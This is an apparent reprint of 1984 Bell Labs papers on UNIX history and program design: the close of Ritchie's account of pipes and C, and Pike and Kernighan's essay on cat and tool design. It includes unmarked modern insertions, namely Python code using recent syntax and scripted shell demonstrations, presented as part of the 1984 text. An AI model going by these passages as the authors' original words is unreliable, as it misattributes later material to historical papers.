At the time, they were evaluating a commercial system for this purpose; the main advantages we offered (besides the dubious one of taking part in an in-house experiment) were two in number: first, we supported Teletype's model 37 terminals, which, with an extended type-box, could print most of the math symbols they required; second, we quickly endowed roff with the ability to produce line-numbered pages, which the Patent department required and which the other system could not handle. During the last half of 1971, we supported three typists from the Patent department, who spent the day busily typing, editing, and formatting patent applications, and meanwhile tried to carry on our own work. UNIX has a reputation for supplying interesting services on modest hardware, and this period may mark a high point in the benefit/equipment ratio; on a machine with no memory protection and a single 0.5-MB disk, every test of a new program required care and boldness, because it could easily crash the system, and every few hours' work by the typists meant pushing out more information onto DECtape, because of the very small disk. The experiment was trying but successful. Not only did the Patent department adopt UNIX, and thus become the first of many groups at the Laboratories to ratify our work, but we achieved sufficient credibility to convince our own management to acquire one of the first PDP-11/45 systems made. We have accumulated much hardware since then, and labored continuously on the software, but because most of the interesting work has already been published (e.g., on the system itself1,5,6 and the text processing applications7,8,9), it seems unnecessary to repeat it here.

VIII. PIPES

One of the most widely admired contributions of UNIX to the culture of operating systems and command languages is the pipe, as used in a pipeline of commands.
Of course, the fundamental idea was by no means new; the pipeline is merely a specific form of coroutine. Even the implementation was not unprecedented, although we didn't know it at the time; the 'communication files' of the Dartmouth Time-Sharing System10 did very nearly what UNIX pipes do, though they seem not to have been exploited so fully.

Pipes appeared in UNIX in 1972, well after the PDP-11 version of the system was in operation, at the suggestion (or perhaps insistence) of M. D. McIlroy, a long-time advocate of the non-hierarchical control flow that characterizes coroutines. Some years before pipes were implemented, he suggested that commands should be thought of as binary operators, whose left and right operands specified the input and output files. Thus a 'copy' utility would be commanded by

    inputfile copy outputfile

To make a pipeline, command operators could be stacked up. Thus, to sort input, paginate it neatly, and print the result off-line, one would write

    input sort paginate offprint

In today's system, this would correspond to

    sort input | pr | opr

The idea, explained one afternoon on a blackboard, intrigued us but failed to ignite any immediate action. There were several objections to the idea as put: the infix notation seemed too radical (we were too accustomed to typing 'cp x y' to copy x to y); and we were unable to see how to distinguish command parameters from the input or output files. Also, the one-input one-output model of command execution seemed too confining. What a failure of imagination!

Some time later, thanks to McIlroy's persistence, pipes were finally installed in the operating system (a relatively simple job), and a new notation was introduced. It used the same characters as for I/O redirection.
For example, the pipeline above might have been written

    sort input >pr>opr>

The idea is that following a '>' may be either a file, to specify redirection of output to that file, or a command into which the output of the preceding command is directed as input. The trailing '>' was needed in the example to specify that the (nonexistent) output of opr should be directed to the console; otherwise the command opr would not have been executed at all; instead a file opr would have been created.

The new facility was enthusiastically received, and the term 'filter' was soon coined. Many commands were changed to make them usable in pipelines. For example, no one had imagined that anyone would want the sort or pr utility to sort or print its standard input if given no explicit arguments.

Soon some problems with the notation became evident. Most annoying was a silly lexical problem: the string after '>' was delimited by blanks, so, to give a parameter to pr in the example, one had to quote:

    sort input >"pr -2" >opr>

Second, in an attempt to give generality, the pipe notation accepted '<' as an input redirection in a way corresponding to '>'; this meant that the notation was not unique. One could also write, for example,

    opr <pr <"sort input" <

The pipe notation using '<' and '>' survived only a couple of months; it was replaced by the present one that uses a unique operator to separate components of a pipeline. Although the old notation had a certain charm and inner consistency, the new one is certainly superior. Of course, it too has limitations. It is unabashedly linear, though there are situations in which multiple redirected inputs and outputs are called for. For example, what is the best way to compare the outputs of two programs? What is the appropriate notation for invoking a program with two parallel output streams?
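Underneath either notation, a pipeline is built from the same fork and exec described earlier plus one new system call. A sketch using Python's os module (the two-command helper is illustrative; a real shell generalizes it to n stages) that runs cmd1 | cmd2 and captures the final output so it can be inspected:

```python
import os

def pipeline(cmd1, cmd2):
    """Run cmd1 | cmd2, returning cmd2's standard output as bytes."""
    pipe_r, pipe_w = os.pipe()         # connects cmd1's output to cmd2's input
    out_r, out_w = os.pipe()           # lets the caller collect cmd2's output

    if os.fork() == 0:                 # left-hand command
        os.dup2(pipe_w, 1)             # its standard output is the pipe
        for fd in (pipe_r, pipe_w, out_r, out_w):
            os.close(fd)
        os.execvp(cmd1[0], cmd1)
        os._exit(127)
    if os.fork() == 0:                 # right-hand command
        os.dup2(pipe_r, 0)             # its standard input is the pipe
        os.dup2(out_w, 1)
        for fd in (pipe_r, pipe_w, out_r, out_w):
            os.close(fd)
        os.execvp(cmd2[0], cmd2)
        os._exit(127)

    for fd in (pipe_r, pipe_w, out_w): # the parent keeps only the far end
        os.close(fd)
    chunks = []
    while chunk := os.read(out_r, 4096):
        chunks.append(chunk)
    os.close(out_r)
    os.wait()
    os.wait()
    return b"".join(chunks)
```

Note that neither command is written with pipes in mind: each simply reads descriptor 0 and writes descriptor 1, which is what makes ordinary filters compose.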
I mentioned above in the section on I/O redirection that Multics provided a mechanism by which I/O streams could be directed through processing modules on the way to (or from) the device or file serving as source or sink. Thus it might seem that stream-splicing in Multics was the direct precursor of UNIX pipes, as Multics I/O redirection certainly was for its UNIX version. In fact I do not think this is true, or is true only in a weak sense. Not only were coroutines well known already, but their embodiment as Multics spliceable I/O modules required that the modules be specially coded in such a way that they could be used for no other purpose. The genius of the UNIX pipeline is precisely that it is constructed from the very same commands used constantly in simplex fashion. The mental leap needed to see this possibility and to invent the notation is large indeed.

IX. HIGH-LEVEL LANGUAGES

Every program for the original PDP-7 UNIX was written in assembly language, and bare assembly language it was — for example, there were no macros. Moreover, there was no loader or link-editor, so every program had to be complete in itself. The first interesting language to appear was a version of McClure's TMG11 that was implemented by McIlroy. Soon after TMG became available, Thompson decided that we could not pretend to offer a real computing service without Fortran, so he sat down to write a Fortran in TMG. As I recall, the intent to handle Fortran lasted about a week. What he produced instead was a definition of and a compiler for the new language B.12 B was much influenced by the BCPL language;13 other influences were Thompson's taste for spartan syntax, and the very small space into which the compiler had to fit. The compiler produced simple interpretive code; although it and the programs it produced were rather slow, it made life much more pleasant.
Once interfaces to the regular system calls were made available, we began once again to enjoy the benefits of using a reasonable language to write what are usually called 'systems programs': compilers, assemblers, and the like. (Although some might consider the PL/I we used under Multics unreasonable, it was much better than assembly language.) Among other programs, the PDP-7 B cross-compiler for the PDP-11 was written in B, and in the course of time, the B compiler for the PDP-7 itself was transliterated from TMG into B.

When the PDP-11 arrived, B was moved to it almost immediately. In fact, a version of the multi-precision 'desk calculator' program dc was one of the earliest programs to run on the PDP-11, well before the disk arrived. However, B did not take over instantly. Only passing thought was given to rewriting the operating system in B rather than assembler, and the same was true of most of the utilities. Even the assembler was rewritten in assembler. This approach was taken mainly because of the slowness of the interpretive code. Of smaller but still real importance was the mismatch of the word-oriented B language with the byte-addressed PDP-11.

Thus, in 1971, work began on what was to become the C language.14 The story of the language developments from BCPL through B to C is told elsewhere,15 and need not be repeated here. Perhaps the most important watershed occurred during 1973, when the operating system kernel was rewritten in C. It was at this point that the system assumed its modern form; the most far-reaching change was the introduction of multiprogramming. There were few externally visible changes, but the internal structure of the system became much more rational and general. The success of this effort convinced us that C was useful as a nearly universal tool for systems programming, instead of just a toy for simple applications.
Today, the only important UNIX program still written in assembler is the assembler itself; virtually all the utility programs are in C, and so are most of the applications programs, although there are sites with many in Fortran, Pascal, and Algol 68 as well. It seems certain that much of the success of UNIX follows from the readability, modifiability, and portability of its software, which in turn follows from its expression in high-level languages.

X. CONCLUSION

One of the comforting things about old memories is their tendency to take on a rosy glow. The programming environment provided by the early versions of UNIX seems, when described here, to be extremely harsh and primitive. I am sure that if forced back to the PDP-7 I would find it intolerably limiting and lacking in conveniences. Nevertheless, it did not seem so at the time; the memory fixes on what was good and what lasted, and on the joy of helping to create the improvements that made life better. In ten years, I hope we can look back with the same mixed impression of progress combined with continuity.

XI. ACKNOWLEDGMENTS

I am grateful to S. P. Morgan, K. Thompson, and M. D. McIlroy for providing early documents and digging up recollections. Because I am most interested in describing the evolution of ideas, this paper attributes ideas and work to individuals only where it seems most important. The reader will not, on the average, go far wrong if he reads each occurrence of 'we' with unclear antecedent as 'Thompson, with some assistance from me.'

REFERENCES

1. D. M. Ritchie and K. Thompson, "The UNIX Time-Sharing System," Comm. Assoc. Comp. Mach., 17, No. 7 (July 1974), pp. 365-75.
2. L. P. Deutsch and B. W. Lampson, "SDS 930 Time-sharing System Preliminary Reference Manual," Doc. 30.10.10, Project GENIE, Univ. Cal. at Berkeley (April 1965).
3. R. J. Feiertag and E. I. Organick, "The Multics Input-Output System," Proc.
Third Symposium on Operating Systems Principles, October 18-20, 1971, pp. 35-41.
4. The Multiplexed Information and Computing Service: Programmers' Manual, Massachusetts Institute of Technology Project MAC, Cambridge, MA (1969).
5. K. Thompson, "UNIX Time-Sharing System: UNIX Implementation," B.S.T.J., 57, No. 6 (July-August 1978), pp. 26-41.
6. S. C. Johnson and D. M. Ritchie, "UNIX Time-Sharing System: Portability of C Programs and the UNIX System," B.S.T.J., 57, No. 6 (July-August 1978), pp. 114-141.
7. B. W. Kernighan, M. E. Lesk, and J. F. Ossanna, "UNIX Time-Sharing System: Document Preparation," B.S.T.J., 57, No. 6 (July-August 1978), pp. 2115-35.
8. B. W. Kernighan and L. L. Cherry, "A System for Typesetting Mathematics," Commun. ACM, 18, No. 3 (March 1975), pp. 151-7.
9. M. E. Lesk and B. W. Kernighan, "Computer Typesetting of Technical Journals on UNIX," Proc. AFIPS NCC, 46 (1977), pp. 879-88.
10. Systems Programmers Manual for the Dartmouth Time Sharing System for the GE 635 Computer, Dartmouth College, Hanover, New Hampshire (1971).
11. R. M. McClure, "TMG — a Syntax Directed Compiler," Proc. 20th ACM National Conf. (1965), pp. 262-74.
12. S. C. Johnson and B. W. Kernighan, "The Programming Language B," Comp. Sci. Tech. Rep. No. 8, Bell Laboratories, Murray Hill, New Jersey (January 1973).
13. M. Richards, "BCPL: A Tool for Compiler Writing and Systems Programming," Proc. AFIPS SJCC, 34 (1969), pp. 557-66.
14. B. W. Kernighan and D. M. Ritchie, The C Programming Language, Englewood Cliffs, NJ: Prentice-Hall, 1978.
15. D. M. Ritchie, S. C. Johnson, M. E. Lesk, and B. W. Kernighan, "UNIX Time-Sharing System: The C Programming Language," B.S.T.J., 57, No. 6 (July-August 1978), pp. 85-113.

AUTHOR

Dennis M. Ritchie, B.A. (Physics), 1963, Ph.D. (Applied Mathematics), 1968, Harvard University; AT&T Bell Laboratories, 1968—. The subject of Mr. Ritchie's doctoral thesis was subrecursive hierarchies of functions.
Since joining AT&T Bell Laboratories, he has worked on the design of computer languages and operating systems. After contributing to the Multics™ project, he joined K. Thompson in the creation of the UNIX operating system, and designed and implemented the C language, in which the system is written. In 1982 he shared the IEEE Emanuel Piore Award with Thompson, and in 1983 he and Thompson won the ACM Turing Award. His current research is concerned with the structure of operating systems.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System: Program Design in the UNIX Environment

By R. PIKE* and B. W. KERNIGHAN*

(Manuscript received October 11, 1983)

Much of the power of the UNIX™ operating system comes from a style of program design that makes programs easy to use and, more importantly, easy to combine with other programs. This style is distinguished by the use of software tools, and depends more on how the programs fit into the programming environment — how they can be used with other programs — than on how they are designed internally. But as the system has become commercially successful and has spread widely, this style has often been compromised, to the detriment of all users. Old programs have become encrusted with dubious features. Newer programs are not always written with attention to proper separation of function and design for interconnection. This paper discusses the elements of program design, showing by example good and bad design, and indicates some possible trends for the future.

I. INTRODUCTION

The UNIX operating system has become a great commercial success, and is likely to be the standard operating system for microcomputers and some mainframes in the coming years. There are good reasons for this popularity.
* AT&T Bell Laboratories.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

One is portability: the operating system kernel and the applications programs are written in the programming language C, and thus can be moved from one type of computer to another with much less effort than would be involved in recreating them in the assembly language of each machine. Essentially the same operating system therefore runs on a wide variety of computers, and users need not learn a new system when new hardware comes along. Perhaps more important, vendors who sell the UNIX system need not provide new software for each new machine; instead, their software can be compiled and run without change on any hardware, which makes the system commercially attractive. There is also an element of zealotry: users of the system tend to be enthusiastic and to expect it wherever they go; the students who used the UNIX system in universities a few years ago are now in the job market and often demand it as a condition of employment.

But the UNIX system was popular long before it was even portable, let alone a commercial success. The reasons for that are more interesting. Except for the initial PDP-7* version, the UNIX system was written for the PDP-11* computer, which was deservedly very popular. The PDP-11 computers were powerful enough to do real computing, but small enough to be affordable by small organizations such as academic departments in universities.
The early UNIX system was smaller but more effective, and technically more interesting, than competing systems on the same hardware. It provided a number of innovative applications of computer science, showing the benefits to be obtained by a judicious blend of theory and practice. Examples include the yacc parser-generator, the diff file comparison program, and the pervasive use of regular expressions to describe string patterns. These led in turn to new programming languages and interesting software for applications like program development, document preparation, and circuit design. Since the system was modest in size, and since essentially everything was written in C, the software was easy to modify, to customize for particular applications, or merely to support a view of the world different from the original. (This ease of change is also a weakness, of course, as evidenced by the plethora of different versions of the system.)

Finally, the UNIX system provided a new style of computing, a new way of thinking of how to attack a problem with a computer. This style was based on the use of tools: using programs separately or in combination to get a job done, rather than doing it by hand, by monolithic self-sufficient subsystems, or by special-purpose, one-time programs. This has been much discussed in the literature, so we don't need to repeat it here; see Ref. 1, for example.

* Trademark of Digital Equipment Corporation.

    11/3/71                                  CAT (I)

    NAME
        cat — concatenate and print

    SYNOPSIS
        cat file1 ...

    DESCRIPTION
        cat reads each file in sequence and writes it on the
        standard output stream.  Thus:

            cat file

        is about the easiest way to print a file.  Also:

            cat file1 file2 >file3

        is about the easiest way to concatenate files.

        If no input file is given cat reads from the standard
        input file.

    FILES

    SEE ALSO
        pr, cp

    DIAGNOSTICS
        none; if a file cannot be found it is ignored.

    BUGS

    OWNER
        ken, dmr

Fig. 1 — Manual page for cat, UNIX 1st edition, November 1971.
II. AN EXAMPLE: CAT

The style of use and design of the tools on the system are closely related. The style is still evolving, and is the subject of this essay: in particular, how the design and use of a program fit together, how the tools fit into the environment, and how the style influences solutions to new problems. The focus of the discussion is a single example, the program cat, which concatenates a set of files onto its standard output. Cat is simple, both in implementation and in use; it is essential to the UNIX system, and it is a good illustration of the kinds of decisions that delight both supporters and critics of the system. (Often a single property of the system will be taken as an asset or as a fault by different audiences; our audience is programmers, because the UNIX environment is designed fundamentally for programming.) Even the name cat is typical of UNIX program names: it is short, pronounceable, but not conventional English for the job it does. (For an opposing viewpoint, see Ref. 2.) Most important, though, cat in its usages and variations exemplifies UNIX program design style and how it has been interpreted by different communities.

Figure 1 is the manual page for cat from the UNIX 1st edition* manual. Evidently, cat copies its input to its output. The input is normally taken from a sequence of one or more files, but it can come from the standard input. The output is the standard output. The manual suggested two uses, the general file copy:

    cat file1 file2 >file3

and printing a file on the terminal:

    cat file

The general case is certainly what was intended in the design of the program.

* The 1st through 7th editions of the UNIX operating system are research versions of the system. Systems I through V are commercial releases of the UNIX system.
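The program described by Fig. 1 fits in a few lines in any language. Here is a sketch in Python standing in for the original implementation (which was assembler, later C); per the DIAGNOSTICS section of the 1st-edition page, a file that cannot be found is silently ignored:

```python
import sys

def cat(names, out=sys.stdout.buffer):
    """Read each named file in sequence and write it to the output;
    with no names, copy the standard input instead."""
    if not names:
        out.write(sys.stdin.buffer.read())
        return
    for name in names:
        try:
            f = open(name, "rb")
        except OSError:
            continue               # 1st edition: a missing file is ignored
        with f:
            while chunk := f.read(65536):
                out.write(chunk)

if __name__ == "__main__":
    cat(sys.argv[1:])
```

Note how little of the program is policy: concatenation, printing, and feeding a pipeline all fall out of the single copy loop, with the shell supplying the redirection.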
Output redirection (provided by the > operator, implemented by the UNIX shell) makes cat a fine general-purpose file concatenator and a valuable adjunct for other programs, which can use cat to process filenames, as in:

    cat file1 file2 ... | other-program

The fact that cat will also print on the terminal is a special case. Perhaps surprisingly, in practice it turns out that the special case is the main use of the program.*

The design of cat is typical of most UNIX programs: it implements one simple but general function that can be used in many different applications (including many not envisioned by the original author). Other commands are used for other functions. For example, there are separate commands for file system tasks like renaming files, deleting them, or telling how big they are. Other systems instead lump these into a single "file system" command with an internal structure and command language of its own. (The PIP file copy program found on CP/M† or RSX-11‡ operating systems is an example.) That approach is not necessarily worse or better, but it is certainly against the UNIX philosophy. Unfortunately, such programs are not completely alien to the UNIX system: some mail-reading programs and text editors, for example, are large self-contained "subsystems" that provide their own complete environments and mesh poorly with the rest of the system. Most such subsystems, however, are usually imported from or inspired by programs on other operating systems with markedly different programming environments.

* The use of cat to feed a single input file to a program has to some degree superseded the shell's < operator, which illustrates that general-purpose constructs, like cat and pipes, are often more natural than convenient special-purpose ones.
† Trademark of Digital Research Inc.
‡ Trademark of Digital Equipment Corporation.

III. CAT -v

There are some significant advantages to the traditional UNIX system approach. The most important is that the surrounding environment, the shell and the programs it can invoke, provides a uniform access to system facilities. File name argument patterns are expanded by the shell for all programs, without prearrangement in each command. The same is true of input and output redirection. Pipes are a natural outgrowth of redirection. Rather than decorate each command with options for all relevant pre- and post-processing, each program expects as input, and produces as output, concise and header-free textual data that connect well with other programs to do the rest of the task at hand. It takes some programming discipline to build a program that works well in this environment (primarily, to avoid the temptation to add features that conflict with or duplicate services provided by other commands) but it's well worthwhile.

Growth is easy when the functions are well separated. For example, the 7th edition shell was augmented with a backquote operator that converts the output of one program into the arguments to another, as in

    cat `cat filelist`

No changes were made in any other program when this operator was invented; because the backquote is interpreted by the shell, all programs called by the shell acquire the feature transparently and uniformly. If special characters like backquotes were instead interpreted, even by calling a standard subroutine, by each program that found the feature appropriate, every program would require at least recompilation whenever someone had a new idea. Not only would uniformity be hard to enforce, but experimentation would be harder because of the effort of installing any changes.

The UNIX 7th edition system introduced two changes in cat. First, files that could not be read, either because of denied permissions or simple nonexistence, were reported rather than ignored.
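The mechanics of the backquote example above can be demonstrated directly. The file names (part1, part2, filelist) are invented for illustration:

```shell
cd "$(mktemp -d)"
printf 'a\nb\n' > part1
printf 'c\n'    > part2
printf 'part1\npart2\n' > filelist

# The inner cat prints the *names* in filelist; the shell turns that
# output into the *arguments* of the outer cat, which then prints the
# contents of every named file.
combined=$(cat `cat filelist`)
```

No program involved here knows anything about backquotes; the shell does all the work, which is exactly the point of the passage above.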
Second, and less desirable, was the addition of a single optional argument, -u, which forced cat to unbuffer its output. (The reasons for this option, which has disappeared again in the 8th edition of the system, are technical and irrelevant here.) But the existence of one argument was enough to suggest more, and other versions of the system soon embellished cat with features. This list comes from cat on the Berkeley distribution of the UNIX system:

    -s   Strip multiple blank lines to a single instance.
    -n   Number the output lines.
    -b   Number only the nonblank lines.
    -v   Make nonprinting characters visible.
    -ve  Mark ends of lines.
    -vt  Change representation of tab.

In System V, there are similar options and even a clash of naming: -s instructs cat to be silent about nonexistent files. But none of these options is an appropriate addition to cat; the reasons get to the heart of how UNIX programs are designed and why they work well together.

It's easy to dispose of (Berkeley) -s, -n, and -b: all of these jobs are readily done with existing tools like sed and awk. For example, to number lines, this awk invocation suffices:

    awk '{ print NR "\t" $0 }' filenames

If line numbering is needed often, this command can be packaged under a name like linenumber and put in a convenient public place. Another possibility is to modify the pr command, whose job is to format text such as program source for output on a line printer. Numbering lines is an appropriate feature in pr; in fact UNIX System V pr has a -n option to do so. There never was a need to modify cat; these options are gratuitous tinkering.

But what about -v? That prints nonprinting characters in a visible representation. Making strange characters visible is a genuinely new function for which no existing program is suitable. ("sed -n l", the closest standard possibility, aborts when given very long input lines, which are more likely to occur in files containing nonprinting characters.)
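The packaging step suggested above, turning the awk one-liner into a command named linenumber, is only a couple of lines. This is a sketch; the name linenumber is the paper's own suggestion, and the script body is one plausible rendering:

```shell
cd "$(mktemp -d)"

# Wrap the awk one-liner in a two-line script and make it executable.
cat > linenumber <<'EOF'
#!/bin/sh
awk '{ print NR "\t" $0 }' "$@"
EOF
chmod +x linenumber

printf 'first\nsecond\n' > src
numbered=$(./linenumber src)
```

Installed in a public directory, this gives everyone line numbering without anyone touching cat.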
So isn't it appropriate to add the -v option to cat to make strange characters visible when a file is printed? The answer is "No". Such a modification confuses what cat's job is (concatenating files) with what it happens to do in a common special case, showing a file on the terminal. A UNIX program should do one thing well, and leave unrelated tasks to other programs. Cat's job is to collect the data in files. Programs that collect data shouldn't change the data; cat therefore shouldn't transform its input.

The preferred approach in this case is a separate program that deals with nonprintable characters. We called ours vis (a suggestive, pronounceable, non-English name) because its job is to make things visible. As usual, the default is to do what most users will want, make strange characters visible, and as necessary include options for variations on that theme. By making vis a separate program, related useful functions are easy to provide. For example, the option -s strips out (i.e., discards) strange characters, which is handy for dealing with files from other operating systems. Other options control the treatment and format of characters like tabs and backspaces that may or may not be considered strange in different situations. Such options make sense in vis because its focus is entirely on the treatment of such characters. In cat, they require an entire sublanguage within the -v option, and thus get even further away from the fundamental purpose of that program. Also, providing the function in a separate program makes convenient options such as -s easier to invent, because it isolates the problem as well as the solution.

One possible objection to separate programs for each task is efficiency.
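The vis program described above is not a standard utility, but the flavor of its -s (strip) option can be approximated with tr, which can delete every character outside a chosen set. This is a rough stand-in for illustration, not the actual program; the octal ranges keep tab, newline, and printable ASCII:

```shell
cd "$(mktemp -d)"

# A file containing a BEL (\007) and a backspace (\010) among
# ordinary text.
printf 'ok\007\010text\n' > weird

# Approximate "vis -s": delete everything that is not tab (\11),
# newline (\12), or printable ASCII (\40-\176).
cleaned=$(tr -cd '\11\12\40-\176' < weird)
```

Making the strange characters visible rather than deleting them is more work (tr cannot expand one byte into several), which is part of why a dedicated program earns its keep.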
For example, if we want numbered lines and visible characters, it is probably more efficient to run the one command

    cat -n -v file

than the two-element pipeline

    linenumber file | vis

In practice, however, cat is usually used with no options, so it makes sense to have the common cases be the efficient ones. The current research version of the cat command is actually about five times faster than the Berkeley and System V versions because it can process data in large blocks instead of the byte-at-a-time processing that might be required if an option is enabled. Also, and this is perhaps more important, it is hard to imagine any of these examples being the bottleneck of a production program. Most of the real time is probably taken waiting for the user's terminal to display the characters, or even for the user to read them.

Separate programs are not always better than wider options; which is better depends on the problem. Whenever one needs a way to perform a new function, one faces the choice of whether to add a new option or write a new program (assuming that none of the programmable tools will do the job conveniently). The guiding principle for making the choice should be that each program does one thing. Options are appropriately added to a program that already has the right functionality. If there is no such program, then a new program is called for. In that case, the usual criteria for program design should be used: the program should be as general as possible, its default behavior should match the most common usage, and it should cooperate with other programs.

IV. FAST TERMINAL LINES

Let's look at these issues in the context of another problem, dealing with fast terminal lines. The first versions of the UNIX system were written in the days when 150 baud was "fast" and all terminals used paper. Today, 9600 baud is typical, and hard-copy terminals are rare.
How should we deal with the fact that output from programs like cat scrolls off the top of the screen faster than one can read it? There are two obvious approaches. One is to tell each program about the properties of terminals, so it does the right thing (whether by option or automatically). The other is to write a command that handles terminals, and leave most programs untouched.

An example of the first approach is Berkeley's version of the ls command, which lists the file names in a directory. Let us call it lsc to avoid confusion. The 7th edition ls command lists file names in a single column, so for a large directory, the list of file names disappears off the top of the screen at great speed. The lsc command prints in columns across the screen (which is assumed to be 80 columns wide), so there are typically four to eight times as many names on each line, and thus the output usually fits on one screen. The option -1 can be used to get the old single-column behavior. Surprisingly, lsc operates differently if its output is a file or pipe:

    lsc

produces output different from

    lsc | cat

The reason is that lsc begins by examining whether its output is a terminal, and prints in columns only if it is. By retaining single-column output to files or pipes, lsc ensures compatibility with programs like grep or wc, which expect things to be printed one per line. This ad hoc adjustment of the output format depending on the destination is not only distasteful, it is unique: no standard system command has this property. A more insidious problem with lsc is that the columnation facility, which is actually a useful, general function, is built in and thus inaccessible to other programs that could use a similar compression. Programs should not attempt special solutions to general problems.
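The test lsc makes at startup is available to shell scripts as well: [ -t 1 ] is true exactly when standard output is a terminal. A sketch of the same destination-dependent behavior (the variable name and messages are invented for illustration):

```shell
# Choose an output format the way lsc does: columns only when
# talking to a terminal, one name per line otherwise.
if [ -t 1 ]; then
    mode=columns        # interactive: pack names across the screen
else
    mode=one-per-line   # file or pipe: keep grep and wc happy
fi
echo "listing mode: $mode"
```

Run at a terminal the first branch is taken; under a pipe or redirection the second is, which is precisely the behavior the text criticizes.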
The automatic columnation in lsc is reminiscent of the "wild cards" found in some systems that provide file name pattern matching only for a particular program. The experience with centralized processing of wild cards in the system shell shows overwhelmingly how important it is to centralize the function where it can be used by all programs.

One solution for the ls problem is obvious: a separate program for columnation, so that columnation into, say, five columns is just

    ls | 5

It is easy to build a first-draft version with the multicolumn option of pr. The commands 2, 3, etc., are all links to a single file:

    pr -$0 -t -l1 $*

$0 is the program name (2, 3, etc.), so -$0 becomes -n, where n is the number of columns that pr is to produce. The other options suppress the normal heading, set the page length to one line, and pass the arguments on to pr. This implementation is typical of the use of tools: it takes only a moment to write, and it serves perfectly well for most applications. If a more general service is desired, such as automatically selecting the number of columns for optimal compaction, a C program is probably required, but the one-line implementation above satisfies the immediate need and provides a base for experimentation with the design of a fancier program, should one become necessary.

Similar reasoning suggests a solution for the general problem of data flowing off screens (columnated or not): a separate program to take any input and print it a screen at a time. Such programs are by now widely available, under names like pg and more. This solution affects no other programs, but can be used with all of them. As usual, once the basic feature is right, the program can be enhanced with options for specifying screen size, backing up, searching for patterns, and anything else that proves useful within that basic job.

There is still a problem, of course.
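The linked-name columnation trick described above can be made runnable as follows. This is a sketch: the script name colscript is invented, and basename is used to recover the invoked name portably (the original one-liner relied on $0 directly):

```shell
cd "$(mktemp -d)"

# One script, to be linked under the names 2, 3, ...; the basename of
# $0 is the column count, which becomes pr's column option.
cat > colscript <<'EOF'
#!/bin/sh
n=$(basename "$0")
pr -$n -t -l1 "$@"
EOF
chmod +x colscript
ln colscript 3          # invoking it as "3" means three columns

printf 'a\nb\nc\n' | ./3 > out   # three names in, one line out
lines=$(wc -l < out)
```

Everything substantive is done by pr; the script merely translates its own name into an option, which is why a whole family of commands costs one file plus links.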
If the user forgets to pipe output into pg, the output that goes off the top of the screen is gone. It would be desirable if the facilities of pg were always present without having to be requested explicitly.

There are related useful functions that are typically only available as part of a particular program, not in a central service. One example is the history mechanism provided by some versions of the UNIX shell: commands are remembered, so it's possible to review and repeat them, perhaps with editing. But why should this facility be restricted to the shell? (It's not even general enough to pass input to programs called by the shell; it applies to shell commands only.) Certainly other programs could profit as well; any interactive program could benefit from the ability to re-execute commands. More subtly, why should the facility be restricted to program input? Pipes have shown that the output from one program is often useful as input to another. With a little editing, the output of commands such as ls or make can be turned into commands or data for other programs.

Another facility that could be usefully centralized is typified by the editor escape in some mail commands. It is possible to pick up part of a mail message, edit it, and then include it in a reply. But this is all done by special facilities within the mail command and so its use is restricted. Each such service is provided by a different program, which usually has its own syntax and semantics. This is in contrast to features such as pagination, which is always the same because it is only done by one program. The editing of input and output text is more environmental than functional; it is more like the shell's expansion of file name metacharacters than automatic numbering of lines of text. But since the shell does not see the characters sent as input to the programs, it cannot provide such editing.
The emacs editor provides a limited form of this capability, by processing all system command input and output, but this is expensive, clumsy, and subjects the users to the complexities and vagaries of yet another massive subsystem (which isn't to criticize the inventiveness of the idea). A potentially simpler solution is to let the terminal or terminal interface do the work, with controlled scrolling, editing and retransmission of visible text, and review of what has gone before. We have used the programmability of the Blit terminal (Ref. 3), a programmable bitmap graphics display, to capitalize on this possibility, to good effect. The Blit uses a mouse to point to characters on the display, which can be edited, rearranged, and transmitted back to the UNIX system as though they had been typed on the keyboard. Because the terminal is essentially simulating typed input, the programs are oblivious to how the text was created; all the features discussed above are provided by the general editing capabilities of the terminal, with no changes to the UNIX programs.

There are some obvious direct advantages to the Blit's ability to process text under the user's control. Shell history is trivial: commands can be selected with the mouse, edited if desired, and retransmitted. Since from the terminal's viewpoint all text on the display is equivalent, history is limited neither to the shell nor to command input. Because the Blit provides editing, most of the interactive features of programs like mail are unnecessary; they are done easily, transparently, and uniformly by the terminal. The most interesting facet of this work, however, is the way it removes the need for interactive features in programs; instead, the Blit is the place where interaction is provided, much as the shell is the program that interprets file name matching metacharacters.
Unfortunately, of course, programming the terminal demands access to a part of the environment that is off limits to most programmers, but the solution meshes well with the environment and is appealing in its simplicity. If the terminal cannot be modified to provide the capabilities, a user-level program or perhaps the UNIX system kernel itself could be modified fairly easily to do roughly what the Blit does, with similar results.

V. CONCLUSIONS

The key to problem solving on the UNIX system is to identify the right primitive operations and to put them at the right place. UNIX programs tend to solve general problems rather than special cases. In a very loose sense, the programs are orthogonal, spanning the space of jobs to be done (although with a fair amount of overlap for reasons of history, convenience, or efficiency). Functions are placed where they will do the most good: there shouldn't be a pager in every program that produces output any more than there should be file name pattern matching in every program that uses file names.

One thing that the UNIX system does not need is more features. It is successful in part because it has a small number of good ideas that work well together. Merely adding features does not make it easier for users to do things; it just makes the manual thicker. The right solution in the right place is always more effective than haphazard hacking.

REFERENCES

1. B. W. Kernighan and R. Pike, The UNIX Programming Environment, Englewood Cliffs, NJ: Prentice-Hall, 1984.
2. D. Norman, "The Truth about UNIX," Datamation, 27, No. 12 (November 1981).
3. R. Pike, "The UNIX System: The Blit: A Multiplexed Graphics Terminal," AT&T Bell Lab. Tech. J., this issue.

AUTHORS

Brian W. Kernighan, B.A.Sc., 1964, University of Toronto; Ph.D., 1969, Princeton University; AT&T Bell Laboratories, 1969-. Mr.
Kernighan has been involved with heuristics for combinatorial optimization problems, programming methodology, software for document preparation, and network optimization. Mr. Kernighan is Head of the Computing Structures Research department, where he has worked in the areas of combinatorial optimization and heuristics, design automation, document preparation systems, programming languages, and software tools. Member, IEEE and ACM.

Rob Pike, AT&T Bell Laboratories, 1980-. As a Member of Technical Staff, Mr. Pike's best-known work at Bell Laboratories has been as co-developer of the Blit bitmap graphics terminal. His research interests include statistical mechanics and cosmology; his practical interests involve interactive graphics hardware and software.

AT&T Bell Laboratories Technical Journal
Vol. 63, No. 8, October 1984
Printed in U.S.A.

The UNIX System: The Blit: A Multiplexed Graphics Terminal

By R. PIKE*

(Manuscript received August 1, 1983)

